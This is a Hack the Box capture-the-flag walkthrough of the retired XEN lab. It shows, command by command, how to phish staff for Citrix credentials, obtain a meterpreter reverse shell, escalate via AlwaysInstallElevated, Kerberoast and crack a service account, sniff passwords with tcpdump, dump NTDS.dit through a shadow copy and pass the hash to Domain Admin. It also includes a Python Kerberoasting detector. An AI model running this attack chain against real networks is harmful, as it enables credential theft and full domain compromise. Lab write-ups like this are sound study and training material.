Hack the Box – XEN (retired June 2020)

First I add the IP of the machine to /etc/hosts as xen.htb.


As always, we start with an nmap scan.

E:\PENTEST>nmap -A -oN htb-endgame-xen
Starting Nmap 7.70 ( ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for (
Host is up (0.024s latency).
Not shown: 997 filtered ports
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| sequence of commands
| sequence of commands
| Hello:
| EHLO Invalid domain address.
| Help:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject:
| Subject Alternative Name:
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
1 24.00 ms
2 24.00 ms (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds


It seems we have HTTP and HTTPS on ports 80 and 443, and SMTP on 25.

Overview of Web Services

Let’s take a quick look at the webpages to see what we have. Port 80 redirected me to port 443, and the certificate for the site provided a new domain of

I didn’t have much to go on, so I decided to do some directory enumeration.

Directory Enumeration

I used wfuzz in this case because gobuster didn’t come up with anything useful.

wfuzz --hc 404 -w raft-small-words.txt

Web Directories

We had several other directories that seemed interesting, but the ones I wanted to look at were Remote and Jakarta.

Opening the, I get the following.

And browsing, I got the following.

I had a look at these for some time to see if I could come up with anything useful; I looked deeper into the directories and for known exploits for the XenApp application.  Knowing this environment is called XEN, I decided to concentrate my efforts on the Remote directory rather than Jakarta.  After spending some more time on this, I decided to investigate the SMTP service. I had done exercises in the past where the users were very responsive.

SMTP Enumeration

I had the domain name of the company, therefore I decided to see if I could get any email addresses and somehow get a response from someone.

smtp-user-enum -M RCPT -U ./usernames.txt -D -t

I found 4 addresses:


Now that I had these 4 addresses, I needed to ensure that I could send mail through.  I decided to use an internal address to try and get a response from someone.

User Response

To see if I was getting a response, I had a listener running to capture anything that may come through.

nc -nlvp 80

I then attempted a lot of different emails and a lot of different subjects.  I eventually got a hit with the subject of Remote.  My thinking was to try and get the users to click on my link, as follows:

telnet 25
helo


DATA
Subject: Remote Portal

Hi,

The URL for the remote portal has now been changed to

Regards


I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something.  The users should trust an email coming in from IT, or so you would think.

Once the email had been sent, I didn’t get a reply, but 30 seconds later some data came back to my listener.  It was the user clicking on the link to the new portal and providing their credentials.

I had a username of pmorgan and a password of Summer1Summer!.  Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.

I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.

I kept this up to see if I could get any more responses and I had one more.

The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I now had 3 users:

pmorgan:Summer1Summer!
jmendes:VivaBARC3L0N@!!!
awardel:@M3m3ntoM0ri@

Citrix XenAPP

I had the 3 users and knew that they must work somewhere.  I browsed to the remote site and entered the credentials of pmorgan.

And I now had access to a desktop.

I tried this for each user that I had, and each of them worked and successfully logged in.

I clicked on the Desktop to access it and was asked to open the launch.ica file, which defaulted to opening with the Citrix Receiver Engine once I had installed icaclientWeb_19.12.0.19_amd64.deb on Kali.

Once I had clicked OK, I was presented with a desktop.  I browsed to the user's Desktop and found the 1st flag.

1 – XEN{wh0_n33d5_2f@?} Breach

Gaining a shell

Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges.  I first made a note of all the users and the desktops they were assigned to.

I created the reverse shell that I wanted so that I could get a meterpreter session.

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=10086 -f exe -o x86exploit.exe

I then proceeded to set up my msfconsole as follows.


Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.

python -m SimpleHTTPServer 80

I then browsed to my machine from the virtual desktop and downloaded the file.

I now started the exploit and got a meterpreter shell.

Privilege Escalation on Desktop

Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges.  I decided to use the local exploit suggester.

I first put my session in the background and started the suggester.

use post/multi/recon/local_exploit_suggester

Seeing the results from the suggester, I decided on using the always install elevated exploit.

use exploit/windows/local/always_install_elevated

I had successfully elevated my privileges.  I looked to see what was on the Administrator Desktop and found the second flag.

2 – XEN{7ru573d_1n574ll3r5} Deploy

Further Enumeration

Now that I had a way into the internal network, I saw it as, and I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a SOCKS proxy within msf.

use auxiliary/server/socks4a

Now that I had done this, I wanted to see what hosts were live on the internal network.  Knowing the IPs of the desktops, I chose to only scan a small range, between 199 and 210.

I managed to get an additional 3 IPs.

  • (DC)
  • (Citrix)
  • (NetScaler)

Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.

With the system shell that I had earlier, I uploaded a Kerberoasting tool (Rubeus).

Further credentials

I now wanted to see if there were any further credentials that I could find.

PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : mturner
[*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir

Directory: C:\Users\pmorgan\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 4/4/2020 11:13 AM 7 cmd.bat
-ar-- 4/6/2019 11:11 PM 19 flag.txt
-a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1
-a--- 3/26/2020 10:56 AM 16128568 netscan64.exe
-a--- 4/6/2020 8:57 PM 295 netscan64.lic
-a--- 4/6/2020 8:57 PM 39301 netscan64.xml
-a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1
-a--- 9/22/2019 10:20 AM 883600 putty.exe
-a--- 11/27/2019 2:17 PM 198144 Rubeus.exe
-a--- 4/6/2020 9:12 PM 2172 service_ticket.txt
-a--- 3/28/2020 11:17 AM 832512 SharpHound.exe
-a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1
-a--- 4/6/2020 8:59 PM 32665 winPEAS.bat
-a--- 4/6/2020 8:59 PM 241152 winPEAS.exe

[to get a proper command prompt we us]
PS C:\Users\pmorgan\Desktop> type cmd.cmd

PS C:\Users\pmorgan\Desktop> type service_ticket.txt 

PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName

I copied the contents of this ticket hash to a file named mturner so that I could run it through hashcat.

I exhausted all the password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with.  I eventually found a ruleset that had potential at

hashcat -m 13100 ./mturner rockyou.txt -r rules/_NSAKEY.v2.dive.rule --debug-mode=1 --debugfile=matched.rule --force -0

After several hours, I eventually got a hit on the password.

We now know that the password for mturner is 4install!
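A defensive counterpart to the Rubeus run above, added here as an example and not part of the original writeup: the domain controller logs every service ticket request as Security event 4769, and the RC4 request Rubeus made for the mturner SPN appears there with TicketEncryptionType 0x17. The event records, user names and IP addresses below are constructed sample data.

```python
# Added example, not code from the original writeup: flag Kerberoast-style
# service ticket requests in Windows Security event 4769 records.
# The Rubeus run above requested an RC4_HMAC (etype 0x17) ticket for the
# mturner MSSQLSvc SPN; on the DC that is a 4769 with TicketEncryptionType
# 0x17 and ServiceName 'mturner'. All records below are constructed samples.
from collections import defaultdict
from typing import Dict, List, Tuple

RC4_HMAC = 0x17   # legacy etype; AES128/AES256 tickets log as 0x11/0x12
SUCCESS = "0x0"   # 4769 Status code for a ticket that was actually issued

# Constructed 4769 records using the Security log field names.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # AES ticket for a computer account: routine workstation traffic.
    {"TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "CITRIX$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.50", "Status": SUCCESS},
    # RC4 ticket for krbtgt: not a roastable service account.
    {"TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": SUCCESS},
    # What the Rubeus kerberoast above looks like: RC4 ticket for a user SPN.
    {"TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "mturner",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": SUCCESS},
    # Failed request: no ticket was issued, so there is nothing to crack.
    {"TargetUserName": "jmendes@HTB.LOCAL", "ServiceName": "mturner",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.51", "Status": "0x1f"},
]


def is_roast_candidate(event: Dict[str, str]) -> bool:
    """True when a 4769 matches the Kerberoast pattern: successfully issued,
    RC4-encrypted, and for a user account (not krbtgt, not a computer)."""
    if event.get("Status", SUCCESS) != SUCCESS:
        return False
    if int(event["TicketEncryptionType"], 16) != RC4_HMAC:
        return False
    service = event["ServiceName"].lower()
    return service != "krbtgt" and not service.endswith("$")


def find_kerberoasting(events: List[Dict[str, str]],
                       threshold: int = 1) -> Dict[Tuple[str, str], List[str]]:
    """Group candidate requests by (requesting user, source IP).

    Rubeus asks for one ticket per roastable SPN in quick succession, so a
    requester with >= threshold distinct service accounts is reported. In
    this lab only one account (mturner) was roastable, hence threshold=1;
    a larger domain would raise it to cut down on legitimate RC4 traffic."""
    seen: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            if ev["ServiceName"] not in seen[key]:
                seen[key].append(ev["ServiceName"])
    return {k: v for k, v in seen.items() if len(v) >= threshold}


if __name__ == "__main__":
    for (user, ip), services in find_kerberoasting(SAMPLE_EVENTS).items():
        print(f"{user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

The mitigation the Rubeus notice itself hints at is to move service accounts to AES-only (so no 0x17 tickets are issued) and to give them long random passwords, which is what made the 4install! hash crackable here.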

SMB Access

Now that I had the new credentials, I looked about a little more to see what else I could find.  I eventually found SMB on and decided to use the credentials found to see if I could see anything.

proxychains smbmap -u mturner -p '4install!' -d htb.local -H

This showed that we had read access to the files located in the Citrix$ share.  I connected to it with smbclient to see what was inside.

proxychains smbclient \\\\\\Citrix$ -U htb.local\\mturner

I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.

I downloaded these files and was able to read the next flag.

3 – XEN{l364cy_5pn5_ftw} Ghost

PuTTY Key Conversion

Now that I had a PuTTY private key file, I had a look at its contents to see if I could get a hint at anything.

It seems this could be used in PuTTY but has a passphrase on it too.  I needed to try and crack the passphrase before I could proceed.  I decided to convert it with putty2john.

putty2john private.ppk > private.hash

Now that I had this file in a readable format for john, I tried to crack the password.

After several hours, all my password lists came up empty.  I was unable to crack the passphrase with what I had.  I decided to look elsewhere for something I could use as a password list generator.  I found a keyboard-walk password generator that seemed interesting and decided to run with it.  I found this at

./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route


Once I had the password list generated, I put it through john to try and crack the passphrase again.

john -w=./passes private.hash

Now that I knew the passphrase for the file, I could convert it for use on my system.  To do this, I used puttygen.

puttygen private.ppk -O private-openssh -o id_rsa

I now had a key file that I could use.

Access to NetScaler

While gathering information I had accumulated many user IDs, and I tried all of them with the private key to get onto the SSH of the NetScaler.  I then quickly found that the default username of these devices is nsroot, and attempted to log in with this user ID.

proxychains ssh -i id_rsa nsroot@

Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything.  After a while of searching, I did not come up with anything useful.  Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through it, following a specific article at

I attempted this to see if I would get any results.

tcpdump -s 0 -A -n -l | egrep -I "POST /|pwd=|passwd=|password=|Host:"


4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage


Knowing that I had access to this box as root, I wanted to perform some additional tests to see what other traffic was being passed through it.  The previous flag seemed to suggest LDAP could be in use. I set up a tcpdump to capture this for me.

tcpdump -w capture.pcap

I now had to transfer the file back to my machine for investigation.  I used scp for this.

proxychains scp -i id_rsa nsroot@ .

I then opened this file within Wireshark to see what I could find.

Now going from the previous hint, I searched for the LDAP traffic and found a password.

The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.

msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 1
msf exploit
root@kali:~/htb/xen# proxychains -request -dc-ip HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
---------------------------------- ------- --------------------------------------- -------------------------- --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936

root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H
ProxyChains-3.1 (
[+] Finding open SMB ports....
[+] User SMB session establishd on
[+] IP: Name: 
Disk Permissions
---- -----------
root@kali:~/xen# proxychains smbclient \\\\\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (
WARNING: The "syslog" option is deprecated
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 8 18:12:51 2019
.. D 0 Wed May 8 18:12:51 2019
Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019
flag.txt AR 20 Sun Mar 31 11:25:10 2019
private.ppk A 1486 Wed May 8 18:21:51 2019
XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019

10485247 blocks of size 4096. 6344443 blocks available


The term doppelganger is a non-biologically related look-alike (Wikipedia).  This provided me with the hint of looking back at the other accounts that were active on the domain.  I immediately got access to a shell again on the desktop and looked up domain details.

I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.

After all, I had tried this account in so many different places to access different resources and none were successful.

net user /domain

After a few attempts at usernames, I discovered that backup-svc had the same password as the NetScaler account; these two essentially shared the same password.  This was our doppelganger. I then tried to log in to the Domain Controller using WinRM and proxychains, because I knew the account was a member of the Backup Operators group, which generally has access.

proxychains ruby winrm_shell_with_upload.rb


root@kali:~/xen# proxychains ruby winrmshell2withupload.rb 
ProxyChains-3.1 (
PS htb\backup-svc@DC Documents> 
PS htb\backup-svc@DC Desktop> type flag.txt
PS htb\backup-svc@DC Desktop>

I looked on the Desktop of backup-svc and found the next flag.

5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger


Now that I was on the box, I wanted to see what privileges I had, to understand what else could be achieved by simply logging in through WinRM.

whoami /priv

This was interesting.  It seems I had a few privileges, including Backup and Restore, which was not surprising given the account is named backup-svc.

I first tried to access the Administrator Desktop and was denied access.

From this I knew something had to be done with the backup privileges.  I had recently done an exercise at the office on retrieving the Active Directory database to extract the hashes.  This is something I do on a regular basis, so I knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS database.

I looked at all the usual methods of creating a shadow copy, including vssadmin and wbadmin.  I then found an article that covered doing this with diskshadow, highlighted in the following document:

Hackinparis2019/blob/master/whoamiprivParis_Split.pdf

I wanted to get RDP access to the machine and therefore set up a port forward to give me access.

portfwd add -l 3389 -r -p 3389

I then tried to open an RDP session to the machine, first with Remmina and then with xfreerdp through proxychains, hoping to give myself a little more access.

Install freerdp-x11

sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v: /u:backup-svc 
ProxyChains-3.1 (
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem

And I was given the RDP access I was looking for.

I now decided to run through diskshadow to see if I could create a shadow of the drive.

Shadow Copies

set context persistent nowriters
add volume c: alias dmwong
create expose %dmwong% z:

Once I had created the shadow copy, I read the files from it by importing the modules found at ug.

I opened PowerShell and imported the 2 modules.

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit
reg save hklm\system c:\temp\system.bak

Now that I had access to these files, I continued to download them onto my system for offline cracking.

Domain Admin

Now that I had these files offline, I needed to extract the hashes.

python /opt/impacket/examples/ -ntds ndts.dit -system system.bak LOCAL

This provided me with all the hashes from the Active Directory Database.  Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.

proxychains python /opt/impacket/examples/ -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@

6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned

Author – Puckiestyle
